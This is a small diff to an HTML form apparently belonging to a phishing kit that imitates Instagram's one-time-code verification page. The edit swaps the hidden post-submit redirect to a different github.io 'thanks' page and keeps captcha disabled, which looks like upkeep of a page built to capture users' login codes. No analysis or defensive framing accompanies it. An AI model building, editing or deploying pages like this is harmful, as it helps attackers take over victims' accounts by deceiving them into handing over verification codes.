--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -73,7 +73,7 @@
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-          <input type="hidden" name="_next" value="https://vtwop.github.io/fvrap/thanks.html">
+          <input type="hidden" name="_next" value="https://vflade.github.io/draxxz/thanks.html">
 <input type="hidden" name="_captcha" value="false">
 
         </form>
